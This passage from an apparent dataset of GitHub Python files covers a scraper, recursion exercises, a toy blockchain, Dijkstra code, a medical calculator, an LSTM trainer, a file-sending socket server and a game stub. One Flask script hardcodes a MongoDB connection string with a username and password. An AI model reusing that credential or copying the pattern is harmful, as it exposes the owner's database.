bs(res.text, 'lxml')\n temp = soup.find('div', {'class':'order-step selected'}).find('div', {'class':'order-step-indicator'}).text\n if '2' in temp:\n orderstatus = 'Order Confirmed'\n trackingnum = 'N/A'\n elif '3' in temp:\n orderstatus = 'Shipped'\n for item in soup.find_all('span', {'class':'order-deliveries-date'}):\n if 'Tracking number' in item.text:\n trackingnum = item.text.replace('Tracking number: ', '')\n product = soup.find('div', {'class':'product'})['data-id']\n return({'Status' : orderstatus, 'Tracking' : trackingnum, 'Product': product})\n\ndef jsonripper():\n try:\n with open('orders.json', 'r') as f:\n data = json.loads(f.read())\n s = input('Add More Orders? (Y/N) : ').lower()\n if s == 'y':\n while True:\n ordernum = input('Enter Order Number (Enter \"Done\" when done adding orders) : ')\n if ordernum.lower() == 'done':\n break\n email = input('Enter Email for Above Order : ')\n data['Orders'].append({\"Order Number\" : ordernum, \"Email\" : email})\n with open('orders.json', 'w') as f:\n json.dump(data, f)\n print('Orders Saved for Next Check!')\n else:\n pass\n except:\n data = {}\n data[\"Orders\"] = []\n while True:\n ordernum = input('Enter Order Number (Enter \"Done\" when done adding orders) : ')\n if ordernum.lower() == 'done':\n break\n email = input('Enter Email for Above Order : ')\n data['Orders'].append({\"Order Number\" : ordernum, \"Email\" : email})\n with open('orders.json', 'w') as f:\n json.dump(data, f)\n print('Orders Saved for Next Check!')\n for item in data['Orders']:\n try:\n status = orderchecker(item['Order Number'], item['Email'])\n print('[{}] [{}] [Tracking : {}]'.format(status['Status'], status['Product'], status['Tracking']))\n except:\n print('Error in Item : ' + str(item))\n\njsonripper()\n","repo_name":"Cosmo3904/AdidasOrderChecker","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2762,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"81783247","text":"def multiply(m, n):\n \"\"\" Takes two positive integers and returns their product using recursion.\n >>> multiply(5, 3)\n 15\n \"\"\"\n if n == 1:\n return m\n else:\n return m + multiply(m, n - 1)\n\n\ndef is_prime(n):\n \"\"\"Returns True if n is a prime number and False otherwise.\n\n >>> is_prime(2)\n True\n >>> is_prime(16)\n False\n >>> is_prime(521)\n True\n \"\"\"\n if n == 1:\n return False\n elif n == 2:\n return True\n else:\n k = 2\n def prime_helper(n, k):\n if k == n:\n return True\n elif n % k == 0:\n return False\n else:\n return prime_helper(n, k + 1)\n return prime_helper(n, k)\n\n\ndef hailstone(n):\n \"\"\"Print out the hailstone sequence starting at n, and return the number of elements in the sequence.\n >>> a = hailstone(10)\n 10\n 5\n 16\n 8\n 4\n 2\n 1\n >>> a\n 7\n \"\"\"\n steps = 1\n def helper(n, steps):\n print(n)\n if n == 1:\n return steps\n else:\n if n % 2 == 0:\n n = n // 2\n else:\n n = n * 3 + 1 \n return helper(n, steps + 1)\n return helper(n, steps)\n\ndef merge(n1, n2):\n \"\"\" Merges two numbers by digit in decreasing order\n >>> merge(31, 42)\n 4321\n >>> merge(21, 0)\n 21\n >>> merge (21, 31) \n 3211\n \"\"\"\n # def get_last(n):\n # return n % 10\n\n # res = 0\n # step = 0\n # def helper(n1, n2, res, step):\n # if n1 == 0 and n2 == 0:\n # return res \n # else: \n # if n1 == 0 or n2 == 0:\n # min_n, max_n = min(n1, n2), max(n1, n2)\n # last = get_last(max_n)\n # max_n = max_n // 10\n # res = last * 10**step + res\n # return helper(min_n, max_n, res, step+1)\n # else:\n # last1, last2 = get_last(n1), get_last(n2)\n # if last1 <= last2:\n # last = last1\n # n1 = n1 // 10\n # else:\n # last = last2\n # n2 = n2 // 10\n # res = last * 10**step + res\n # return helper(n1, n2, res, step+1)\n\n # return helper(n1, n2, res, step)\n if n1 == 0:\n return n2\n elif n2 == 0:\n return n1\n elif n1 % 10 <= n2 % 10:\n return merge(n1 // 10, n2) * 10 + n1 % 10\n else:\n return merge(n1, n2 // 10) * 10 + n2 % 10\n","repo_name":"zhanglinfengcs/CS61A","sub_path":"disc/disc03/disc03.py","file_name":"disc03.py","file_ext":"py","file_size_in_byte":2489,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"32724596999","text":"'''每个区块链都包含时间、自己的哈希值、上一区块的哈希值、难度、随机值、交易数据\n每个区块的哈希值=计算(一系列的值+上一区块的哈希值)\n'''\n\nimport time #获取目前的时间\nimport hashlib\nimport json\n\nclass Block():\n\n def __init__(self, msg , previous_hash):\n self.time_stamp = time.asctime(time.localtime(time.time()))#获取这个区块产生的时间\n self.previous_hash = previous_hash#获取上一个区块的哈希值\n self.msg = msg#我们的信息\n self.nonce = 1\n self.hash =self.get_hash()#自己的哈希值\n\n def get_hash(self):#计算哈希值的功能\n data = self.time_stamp +self.msg +self.previous_hash + str(self.nonce)#将各种信息相加\n hash256 = hashlib.sha256()\n hash256.update(data.encode('gb2312'))#计算这个哈希值\n return hash256.hexdigest()\n\n def mine(self, diffculty):\n target =''\n for each_num in range(0,diffculty):\n target = target +'0'\n while(int(self.hash[0:diffculty] != target)):\n self.nonce = self.nonce + 1\n self.hash= self.get_hash()\n print('Mined a new block')\n\nclass EduChain():\n\n def __init__(self, diffculty):#初始化区块链\n self.list = [] #创建一个空列表\n self.diffculty = diffculty\n def add_block(self , block):#添加区块\n block.mine(self.diffculty)\n self.list.append(block)\n\n def show(self):#打印所有区块\n json_res = json.dumps(self.list, default=self.block_dict)\n print(json_res)\n def block_dict(self , block):\n return block.__dict__\n\n def isChainValid(self):\n for i in range(1, len(self.list)):\n current_block = self.list[i]\n previous_block = self.list[i-1]\n if(current_block.hash != current_block.get_hash()):\n print('Current Block is not equal')\n return False\n if(current_block.previous_hash != previous_block.hash):\n print('Previous hash is not equal')\n return False\n print('All the blocks are correct')\n return True\n\nc = EduChain(3)\nc.add_block(Block('first', '0'))\nc.add_block(Block('second', c.list[len(c.list)-1].hash))\nc.show()\nc.isChainValid()\n","repo_name":"houxiangying/mhc","sub_path":"EduChain.py","file_name":"EduChain.py","file_ext":"py","file_size_in_byte":2325,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"71637651761","text":"import pandas as pd\nfrom sqlalchemy import create_engine\n\ndef makeFileIntoSQL(filename, sqlName, sqlEngine):\n chunksize = 20000\n j = 0\n index_start = 1\n for df in pd.read_csv(filename, chunksize=chunksize, iterator=True, encoding='utf-8'):\n df = df.rename(columns={c: c.replace(' ', '') for c in df.columns}) # Remove spaces from columns\n df.index += index_start\n df.to_sql(sqlName, sqlEngine, if_exists='append') ##change to if_exists='replace' if you don't want to replace the database file\n index_start = df.index[-1] + 1\n\ndisk_engine = create_engine('sqlite:///awesome.db')\nmakeFileIntoSQL('uscities.csv', 'data', disk_engine)\n\ndata = pd.read_sql_query('SELECT city,city_ascii,state_id,state_name,population FROM data', disk_engine)\nprint(data) ","repo_name":"msiddiq1400/Task_Python","sub_path":"python_db_convert.py","file_name":"python_db_convert.py","file_ext":"py","file_size_in_byte":801,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"2323664298","text":"from create_images.Application import Application\nfrom PyQt5.QtWidgets import QApplication\nimport sys\n\n\ndef main():\n qapp = QApplication(sys.argv)\n app = Application()\n app.show()\n\n sys.exit(qapp.exec_())\n\n\nif __name__ == \"__main__\":\n main()","repo_name":"DavidTelenko/BingImageCreatorView_v1","sub_path":"create_images/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":256,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"28325909153","text":"\nfrom settings import Setting\nfrom apscheduler.triggers.interval import IntervalTrigger\nfrom apscheduler.triggers.cron import CronTrigger\nfrom apscheduler.triggers.date import DateTrigger\n\n'''\n计划任务管理器需要使用到的公共函数。\n'''\n\ndef trigger_to_dict(trigger):\n '''\n 将触发器对象转换为字典对象。\n '''\n if type(trigger) is CronTrigger:\n return {\n 'type': 'cron',\n 'start_date': trigger.start_date.strftime(Setting.DATETIME_FORMAT) if trigger.start_date else None,\n 'end_date': trigger.end_date.strftime(Setting.DATETIME_FORMAT) if trigger.end_date else None,\n 'fields': {field.name: str(field) for field in trigger.fields}\n }\n elif type(trigger) is IntervalTrigger:\n return {\n 'type': 'interval',\n 'start_date': trigger.start_date.strftime(Setting.DATETIME_FORMAT) if trigger.start_date else None,\n 'end_date': trigger.end_date.strftime(Setting.DATETIME_FORMAT) if trigger.end_date else None,\n 'interval': trigger.interval_length\n }\n\n elif type(trigger) is DateTrigger:\n return {\n 'type': 'date',\n 'run_date': trigger.run_date.strftime(Setting.DATETIME_FORMAT)\n }\n else:\n return {\n 'type': trigger.__module__\n }\n\n\ndef job_to_dict(job):\n '''\n 将任务对象转换为字典对象\n '''\n return {\n 'id': job.id,\n 'name': job.name,\n 'func': get_job_func_name(job),\n 'args': job.args,\n 'kwargs': job.kwargs,\n 'pending': job.pending,\n 'trigger': trigger_to_dict(job.trigger),\n 'next_run_time': job.next_run_time.strftime(Setting.DATETIME_FORMAT) if job.next_run_time else None,\n 'misfire_grace_time': job.misfire_grace_time,\n 'coalesce': job.coalesce,\n 'max_instances': job.max_instances\n }\n\n\ndef get_job_func_name(job):\n '''\n 获取任务对象的运行函数名字,省略了任务模块前缀。\n '''\n if job.func_ref.startswith(Setting.SCHEDULER_JOBS_PATH):\n return job.func_ref[(len(Setting.SCHEDULER_JOBS_PATH)+1):]\n else:\n return job.func_ref\n\n\ndef get_job_trigger_type(job):\n '''\n 获取任务对象的触发器类型,返回值为 str 类型。\n '''\n trigger = job.trigger\n name = trigger.__module__\n if type(trigger) is CronTrigger:\n name = 'cron'\n elif type(trigger) is IntervalTrigger:\n name = 'interval'\n elif type(trigger) is DateTrigger:\n name = 'date'\n return name\n","repo_name":"helscn/flask-crm","sub_path":"backend/schedulers/func.py","file_name":"func.py","file_ext":"py","file_size_in_byte":2579,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"5028443078","text":"from flask import Flask, render_template, Response, request, redirect, url_for\r\nimport pymongo\r\nimport base64\r\nfrom pymongo import MongoClient\r\napp = Flask(__name__)\r\n\r\n@app.route(\"/\")\r\ndef index():\r\n return render_template('index.html')\r\n\r\n@app.route(\"/forward/\", methods=['POST'])\r\ndef move_forward():\r\n cluster =MongoClient(\"mongodb+srv://himanshu7:hatekube000@cluster0-umtto.mongodb.net/test?retryWrites=true&w=majority\")\r\n db = cluster[\"resume\"]\r\n collection = db[\"coll_resume\"]\r\n\r\n with open(r\"C:\\Users\\HimanshuKholiya\\Downloads\\GITresume\\GITresume\\Resume\\spandana.pdf\", \"rb\") as pdf_file:\r\n encoded_string = base64.b64encode(pdf_file.read())\r\n\r\n abc=db.coll_resume.insert_one({\"image\":encoded_string})\r\n forward_message = \"File Upload Successful\"\r\n return render_template('index.html', forward_message=forward_message);\r\n\r\nif __name__ == '__main__':\r\n app.run(host='127.0.0.1', port=7000, debug=True)","repo_name":"himanshukholiya/upload_resume_portal","sub_path":"connectatlas.py","file_name":"connectatlas.py","file_ext":"py","file_size_in_byte":941,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"12675152901","text":"# 모든 노드가 신호를 받는데 걸리는 시간\n# 모든 노드가 도달할 수 있는지 여부\nimport collections\nimport heapq\n\n\nclass NetworkDelayTime:\n def getNetworkDelayTime(self, network: [[]], N: int, start_node: int) -> int:\n graph = collections.defaultdict(list)\n\n for u, v, w in network:\n graph[u].append((v, w)) # graph[2] = (1, 1)\n\n Q = [{0, start_node}]\n dist = collections.defaultdict(int)\n\n while Q:\n time, node = heapq.heappop(Q)\n if node not in dist:\n dist[node] = time\n for v, w in graph[node]:\n alt = time + w\n heapq.heappush(Q, (alt, v))\n\n if len(dist) == N:\n return max(dist.values())\n\n\nnetwork = [[2, 1, 1], [2, 3, 1], [3, 4, 1]]\ninstance = NetworkDelayTime()\ninstance.getNetworkDelayTime(network, 4, 2)\n","repo_name":"HONOOUR/Algorithm_Test","sub_path":"Algorithm_Python/NetworkDelayTime.py","file_name":"NetworkDelayTime.py","file_ext":"py","file_size_in_byte":894,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"71536371761","text":"from heapq import heappop, heappush\n\n\n# Data structure to store graph edges\nclass Path:\n def __init__(self, source, dest, weight):\n self.source = source\n self.dest = dest\n self.weight = weight\n\n\n# Data structure to store heap nodes\nclass Node:\n def __init__(self, vertex, weight):\n self.vertex = vertex\n self.weight = weight\n\n # 'Override the __lt__() function to make `Node` class work with min heap\n def __lt__(self, other):\n return self.weight < other.weight\n\n\n# class to represent a graph object\nclass Graph:\n def __init__(self, paths, N):\n # allocate memory for the adjacency list\n self.adj = [[] for _ in range(N)]\n # add paths to the undirected graph by Index or Node u\n for path in paths:\n self.adj[path.source].append(path)\n\n\ndef get_route(prev, i, route):\n if i >= 0:\n get_route(prev, prev[i], route)\n route.append(i)\n\n\n# Run Dijkstra's algorithm on given graph\ndef shortest_path(graph, source, N):\n # create min heap and push source node having distance 0\n pq = []\n heappush(pq, Node(source, 0))\n # set distance from source to v infinite initially\n dist = [float('inf')] * N\n\n # distance from source to itself is zero\n dist[source] = 0\n\n # list to track vertices for which minimum cost is already found\n visited = [False] * N\n visited[source] = True\n\n # stores predecessor of a vertex (to print path)\n prev = [-1] * N\n route = []\n\n # run till min heap is empty\n while pq:\n\n node = heappop(pq) # Remove and return best vertex\n u = node.vertex # get vertex number\n\n # do for each neighbor v of u\n for path in graph.adj[u]:\n v = path.dest\n weight = dist[u] + path.weight\n\n # Relaxation step\n if not visited[v] and weight < dist[v]:\n dist[v] = weight\n prev[v] = u\n heappush(pq, Node(v, dist[v]))\n\n # marked vertex u as visited\n visited[u] = True\n\n for i in range(1, N):\n if i != source and dist[i] != float('inf'):\n get_route(prev, i, route)\n # print(f\"Path ({source} -> {i}): Minimum Cost = {dist[i]}, Route = {route}\")\n route.clear()\n\n\nif __name__ == '__main__':\n # initialize paths as per above diagram\n # (u, v, w) triplet represent undirected path from\n # vertex u to vertex v having weight w\n paths = [Path(0, 1, 10), Path(0, 4, 3), Path(1, 2, 2),\n Path(1, 4, 4), Path(2, 3, 9), Path(3, 2, 7),\n Path(4, 1, 1), Path(4, 2, 8), Path(4, 3, 2)]\n\n # Set number of vertices in the graph\n N = 5\n\n # construct graph\n graph = Graph(paths, N)\n\n source = 0\n shortest_path(graph, source, N)\n\n# Path (0 -> 1): Minimum Cost = 4, Route = [0, 4, 1]\n# Path (0 -> 2): Minimum Cost = 6, Route = [0, 4, 1, 2]\n# Path (0 -> 3): Minimum Cost = 5, Route = [0, 4, 3]\n# Path (0 -> 4): Minimum Cost = 3, Route = [0, 4]","repo_name":"Koubae/Algorithm-Complete-Guide","sub_path":"Algorithms/src/Graph-Algorithms/Dijkstra/Python/dijkstra_1.py","file_name":"dijkstra_1.py","file_ext":"py","file_size_in_byte":2991,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"43167437932","text":"import sys\nfrom PyQt5 import QtWidgets,QtCore,QtGui\n\nfrom Ui_Ccr_main import *\n\nclass Ccr_MainWin(QtWidgets.QWidget):\n \n def __init__(self,parent=None):\n super().__init__(parent)\n self.ui = Ui_Ccr()\n self.a = self.ui.setupUi(self)\n self.ini_set() # 加载窗口初始设置\n\n def ini_set(self):\n self.center() # 设置窗口居中\n self.input_valid() # 设置数据输入格式限制\n self.ui.pushButton.clicked.connect(self.check_data_miss) #按键链接槽函数进行计算\n\n # 设定函数使窗口位置居中\n def center(self): \n screen = QtWidgets.QApplication.desktop()\n size = self.geometry()\n self.move((screen.width() - size.width())/2,(screen.height() - size.height())/2) \n\n # 设置函数限制输入数据格式\n def input_valid(self):\n self.ui.lineEdit.setValidator(QtGui.QIntValidator(1,100))\n self.ui.lineEdit_2.setValidator(QtGui.QDoubleValidator(15.0,500.0,2))\n self.ui.lineEdit_3.setValidator(QtGui.QDoubleValidator(1.0,200.0,2))\n \n # 检查数据空项\n def check_data_miss(self):\n data_miss =[] #创建确实数据容器\n data_miss_str='' #空项字符串\n\n if self.ui.lineEdit.text()=='':\n data_miss.append('年龄,')\n if self.ui.lineEdit_2.text()=='':\n data_miss.append('体重,')\n if self.ui.lineEdit_3.text()=='':\n data_miss.append('血肌酐值,')\n\n if len(data_miss) != 0: #审查是否有空项\n data_miss[-1]=data_miss[-1][0:-1]+'.' #删除最后的逗号改为句号\n for i in range (len(data_miss)):\n data_miss_str=data_miss_str+data_miss[i] \n QtWidgets.QMessageBox.warning(self,'缺少必要数据','缺少的数据:'+data_miss_str) #如果空项,提醒\n else: #如果无空项,调用计算\n self.caculate()\n\n \n # 设置函数进行数据最终计算\n def caculate(self):\n \n gender = 1.0 # 设置性别因子\n if self.ui.radioButton.isChecked()==True:\n gender=1.0\n else:\n gender=0.85\n age = int(self.ui.lineEdit.text()) #获取年龄\n weight = float(self.ui.lineEdit_2.text()) #获取体重\n cr = float(self.ui.lineEdit_3.text()) #获取血肌酐值\n\n ccr = 140*weight/(0.818*cr)*gender #计算ccr结果\n self.ui.label_7.setText(str(ccr)) #输出结果\n\n\ndef main():\n app = QtWidgets.QApplication(sys.argv)\n main = Ccr_MainWin()\n main.show()\n sys.exit(app.exec_())\nif __name__ == \"__main__\":\n main()","repo_name":"mawang98/Ccr_caculator","sub_path":"Ccr_Qt.py","file_name":"Ccr_Qt.py","file_ext":"py","file_size_in_byte":2689,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"70485192563","text":"import multiprocessing as mp\nimport traceback\nfrom typing import Optional, Tuple\n\n\nclass ProcessWithException(mp.Process):\n \"\"\"\n to be treated same as usual multiprocessing process, with\n p = Process(target=target, args=args)\n p.start()\n p.join()\n p.print_and_raise_if_has_exception()\n\n extended from stack overflow https://stackoverflow.com/a/33599967/11837276\n \"\"\"\n _exception: Optional[Tuple[Exception, str]]\n\n def __init__(self, *args, **kwargs):\n mp.Process.__init__(self, *args, **kwargs)\n self._pconn, self._cconn = mp.Pipe()\n self._exception = None\n\n def run(self):\n try:\n mp.Process.run(self)\n self._cconn.send(None)\n except Exception as e:\n tb = traceback.format_exc()\n self._cconn.send((e, tb))\n # raise e # You can still rise this exception if you need to\n\n @property\n def exception(self) -> Tuple[Exception, str]:\n if self._pconn.poll():\n self._exception = self._pconn.recv()\n return self._exception\n\n def print_and_raise_if_has_exception(self):\n if self.exception is None:\n return\n print(\"=\" * 30 + \"\\n\")\n print(\"=\" * 30 + \"\\n\")\n print(\"=\" * 30 + \"\\n\")\n print(self.exception[1])\n raise self.exception[0]\n","repo_name":"tjangoW/computerSitTimer","sub_path":"computerSitTimer/MultiprocessingWithException.py","file_name":"MultiprocessingWithException.py","file_ext":"py","file_size_in_byte":1329,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"27883839935","text":"import numpy as np\r\nimport pandas as pd\r\nimport lstm_enc_dec\r\nimport torch\r\nfrom sklearn.model_selection import train_test_split\r\n\r\ndf = pd.DataFrame(pd.read_csv(\"preprocessed1.csv\"))\r\ndf.head()\r\n\r\ndf.info()\r\n\r\nY = df['M_RAIN_PERCENTAGE']\r\nnumpred = df['Num_Predictions'].max()\r\nX = df[['M_TRACK_TEMPERATURE', 'M_TRACK_LENGTH','M_FORECAST_ACCURACY', 'M_AIR_TEMPERATURE','M_NUM_WEATHER_FORECAST_SAMPLES', 'M_TRACK_ID','M_SEASON_LINK_IDENTIFIER', 'M_WEATHER_FORECAST_SAMPLES_M_SESSION_TYPE', 'M_WEATHER_FORECAST_SAMPLES_M_WEATHER','M_WEATHER_FORECAST_SAMPLES_M_TRACK_TEMPERATURE','M_TRACK_TEMPERATURE_CHANGE','M_WEATHER_FORECAST_SAMPLES_M_AIR_TEMPERATURE','M_AIR_TEMPERATURE_CHANGE']]\r\nX_train, X_test, y_train, y_test = train_test_split(X,Y, test_size = 0.2, random_state = 42)\r\nprint(X_train.shape)\r\nprint(y_train.shape)\r\n\r\nx_torch_train = torch.from_numpy(X_train.to_numpy()).type(torch.Tensor)\r\nx_torch_test = torch.from_numpy(X_test.to_numpy()).type(torch.Tensor)\r\ny_torch_train = torch.from_numpy(y_train.to_numpy().reshape(-1,1)).type(torch.Tensor)\r\ny_torch_test = torch.from_numpy(y_test.to_numpy()).type(torch.Tensor)\r\nx_torch_train = torch.reshape(x_torch_train,(5,571565,x_torch_train.shape[1]))\r\ny_torch_train = torch.reshape(y_torch_train,(5,571565,y_torch_train.shape[1]))\r\nprint(x_torch_train.shape)\r\nprint(y_torch_train.shape)\r\n\r\n#device =torch.device('cuda' if torch.cuda.is_available() else 'cpu')\r\ndevice = torch.device('cpu')\r\nmodel = lstm_enc_dec.lstm_seq2seq(input_size = x_torch_train.shape[2], hidden_size = 7)\r\nmodel.to(device)\r\nx_torch_train.to(device)\r\nx_torch_test.to(device)\r\ny_torch_train.to(device)\r\ny_torch_test.to(device)\r\nloss = model.train_model(x_torch_train, y_torch_train, n_epochs = 50, target_len = 5, batch_size = 200, training_prediction = 'recursive', teacher_forcing_ratio = 0.6, learning_rate = 0.01, dynamic_tf = False)\r\n\r\nprint(loss)\r\n\r\nimport pickle\r\nwith open('model.pkl', 'wb') as model_file:\r\n pickle.dump(model, model_file)","repo_name":"ishdh/FormulaAI2022","sub_path":"model_train.py","file_name":"model_train.py","file_ext":"py","file_size_in_byte":1976,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"7102914586","text":"from math import inf\n\nfrom . import Abstraction\nfrom utils import *\n\n\nclass CompositeAbstraction(Abstraction):\n def __init__(self, abstractions):\n if isinstance(abstractions[0], tuple):\n self.abstractions = [a(op) for a, op in abstractions]\n else:\n self.abstractions = abstractions\n\n def __str__(self):\n string = \"[\"\n for i, abstraction in enumerate(self.abstractions):\n if i > 0:\n string += \", \"\n string += str(abstraction)\n return string + \"]\"\n\n def long_str(self):\n string = \"Composite: [\"\n comma = \"\"\n for abstraction in self.abstractions:\n string += comma + abstraction.long_str()\n comma = \", \"\n string += \"]\"\n return string\n\n def short_str(self):\n string = \"Composite: [\"\n comma = \"\"\n for abstraction in self.abstractions:\n string += comma + abstraction.short_str()\n comma = \", \"\n string += \"]\"\n return string\n\n def __len__(self):\n return len(self.abstractions)\n\n def initialize(self, n_watched_neurons):\n for abstraction in self.abstractions:\n abstraction.initialize(n_watched_neurons)\n\n def add(self, class_id, vector):\n for abstraction in self.abstractions:\n abstraction.add(class_id, vector)\n\n def finalize(self):\n for abstraction in self.abstractions:\n abstraction.finalize()\n\n def isknown(self, vector, skip_confidence=False, novelty_mode=False):\n # average\n if COMPOSITE_ABSTRACTION_POLICY == 0:\n confidence_known = 0.0\n n_known = 0\n confidence_unknown = 0.0\n n_unknown = 0\n for abstraction in self.abstractions:\n result, confidence = abstraction.isknown(vector, skip_confidence=skip_confidence,\n novelty_mode=novelty_mode)\n if result:\n n_known += 1\n confidence_known += confidence\n else:\n n_unknown += 1\n confidence_unknown += confidence\n\n # determine winner\n if n_known > 0:\n confidence_known /= float(n_known)\n if n_unknown > 0:\n confidence_unknown /= float(n_unknown)\n total_confidence = confidence_known + confidence_unknown # normalization factor\n if confidence_known > confidence_unknown:\n return True, confidence_known / total_confidence\n else:\n return False, confidence_unknown / total_confidence\n # maximum\n elif COMPOSITE_ABSTRACTION_POLICY == 1:\n highest_confidence = -1.0\n for abstraction in self.abstractions:\n result, confidence = abstraction.isknown(vector)\n if result:\n return result, confidence\n else:\n highest_confidence = max(highest_confidence, confidence)\n return False, highest_confidence\n\n else:\n raise NotImplementedError(\"Policy {} is not available.\".format(COMPOSITE_ABSTRACTION_POLICY))\n\n def clear(self):\n for abstraction in self.abstractions:\n abstraction.clear()\n\n def add_finalized(self, class_id, vector):\n for abstraction in self.abstractions:\n abstraction.add_finalized(class_id, vector)\n\n def default_options(self):\n return [(type(a), a.default_options()) for a in self.abstractions], # needs to be a tuple\n\n def update_clustering(self, clusters):\n for abstraction in self.abstractions:\n abstraction.update_clustering(clusters)\n\n def add_clustered(self, values, clusterer):\n clusters = clusterer.predict(values)\n cluster2values = dict()\n for vj, cj in zip(values, clusters):\n if cj in cluster2values.keys():\n cluster2values[cj].append(vj)\n else:\n cluster2values[cj] = [vj]\n for cj, clustered_values in cluster2values.items():\n self.add_clustered_to_set(clustered_values, cj, self.mean_computer(clusterer, cj))\n\n def add_clustered_to_set(self, values, cj, mean_computer):\n for abstraction in self.abstractions:\n abstraction.add_clustered_to_set(self, values, cj, mean_computer)\n\n def closest_mean_dist(self, vector):\n min_distance = inf\n for abstraction in self.abstractions:\n min_distance = min(min_distance, abstraction.closest_mean_dist(vector))\n return min_distance\n\n def plot(self, dims, color, ax):\n for abstraction in self.abstractions:\n abstraction.plot(dims, color, ax)\n\n def isempty(self):\n for abstraction in self.abstractions:\n if not abstraction.isempty():\n return False\n return True\n","repo_name":"VeriXAI/Outside-the-Box","sub_path":"abstractions/CompositeAbstraction.py","file_name":"CompositeAbstraction.py","file_ext":"py","file_size_in_byte":4950,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"75"} +{"seq_id":"8026862339","text":"#!/usr/bin/env python\n#-*-coding:utf-8-*-\n# server\n\nimport socket,os,hashlib\nserver = socket.socket()\nhost = socket.gethostname()\nport = 9999\n# server.bind(('localhost',9999))\nserver.bind((host,port))\n\nserver.listen()\n\nwhile True:\n conn,addr = server.accept()\n print('New Conn:',addr)\n while True:\n print(\"等待新指令……\")\n data = conn.recv(1024)\n if not data:\n print(\"客户端已断开。\")\n break\n cmd,filename = data.decode().split()\n print(filename)\n if os.path.isfile(filename):\n f = open(filename,\"rb\")\n m = hashlib.md5()\n file_size = os.stat(filename).st_size\n conn.send(str(file_size).encode())\n conn.recv(1024)\n for line in f:\n m.update(line)\n conn.send(line)\n print(\"file md5\",m.hexdigest())\n f.close()\n conn.send(m.hexdigest().encode())\n print(\"send done\")\nserver.close()","repo_name":"huyuedong/travel","sub_path":"08/ftp_md5/socket_server.py","file_name":"socket_server.py","file_ext":"py","file_size_in_byte":999,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"31679876399","text":"\"\"\"This file is what is run to start the program. This files mainly includes\n Mode Handling (self-made)\n 2D Visuals\n Collisions\n Power Ups\n Contains many core-game attributes\"\"\"\n\n\n# from https://www.diderot.one/course/34/chapters/2808/#anchor-segment-214904\nfrom cmu_112_graphics import * #ModalApp, App, Mode\n\n\nfrom Geometry import *\nfrom Runner import *\nfrom DataManagement import *\n\n\n#from built-in functions into Python 3.85\nimport copy\nimport math\nimport random\n\n\"\"\"IMPORTANT CREDENTIAL NOTICE:\n ALL IMAGES WERE SELF-DRAWN BY ANTOINE ASSAF (CREATOR OF GAME)\n\"\"\"\n\n#from @B2-1-33 www.diderot.one/course/34/chapters/2605/#anchor-atom-186051\ndef distance(x0, y0, x1, y1):\n return math.sqrt((x0 - y0)**2 + (x1 - y1)**2)\n\n#from @B0-1-56 www.diderot.one/course/34/chapters/2288/#anchor-atom-188353 \ndef almostEqual(d1, d2, epsilon=10**-7):\n return (abs(d2 - d1) < epsilon)\n\n#from @B0-8-115 www.diderot.one/course/34/chapters/2604/#anchor-atom-189700\ndef readFile(path): \n with open(path, \"rt\") as f: \n return f.read() \n\n#from @B0-8-115 www.diderot.one/course/34/chapters/2604/#anchor-atom-189700\ndef writeFile(path, contents): \n with open(path, \"wt\") as f: \n f.write(contents) \n\nclass MetroMastersApp(App):\n def appStarted(self):\n\n #essentially I will need to craft a make-shift ModalApp because the one provided by CMU lags\n self.currentMode = \"home\"\n\n self.cx = self.width/2\n self.cy = self.height/2\n\n self.transitioning = False\n self.toMode = \"home\" #default\n self.transitionFrame = 0\n self.transitionFrames = 6\n self.dF = 1\n\n self.personalHighest = 0\n\n self.defaultHorizonLevel = self.height/4\n self.focus = [self.width/2,self.defaultHorizonLevel]\n self.timerDelay = 25\n self.cameraPos = [0,0]\n self.scrollZ = self.timeElapsed = self.score = self.coinsCollected = 0\n self.multiplier = 1\n self.objects = []\n self.coins = []\n self.planks = []\n self.runner = Runner(self, \"black\")\n self.storedOldCameraPos = self.laneSwitchTime = 0\n self.storedOldCameraFoc = self.focus[0]\n self.levelHeight = .35 #how tall is the graphic for each level\n self.gravity = -2.5\n self.speed = .055\n self.oldSpeed = 0\n self.difficulty = 1 #goes up to 5\n self.map = random.choice([\"MALIBU\", \"GOLDEN GATE BRIDGE\"])\n self.possibleMoves = [\n \"TRAIN0\", \"TRAIN1\", \"TRAIN2\",\n \"LADDER0\", \"LADDER1\", \"LADDER2\",\n \"DUCK0\", \"DUCK1\", \"DUCK2\",\n \"JUMP0\", \"JUMP1\", \"JUMP2\"]\n self.allPowerUps = [\"AI\",\"SPEEDY BOOTS\", \"DOUBLE POINTS\",\"MAGNET\"] \n self.mouseDragPos = [[None, None],[None, None]] #start drag position, end drag position\n\n #this essentially locates where the objects are (z where player is). There are 18 \"locations\" an object can be in\n #for each lane\n #there is are two levels (on ground or on train)\n #An object can be hurt someone jumping, running, or ducking\n #True means an object exists there\n self.collisionBox = [\n [[False, False, False],[False, False, False]], \n [[False, False, False],[False, False, False]],\n [[False, False, False],[False, False, False]]]\n\n #images (ALL IMAGES ARE SELF-DRAWN BY ANTOINE ASSAF)\n self.background = self.loadImage('Background.png')\n self.background = self.scaleImage(self.background, 5)\n self.logo = 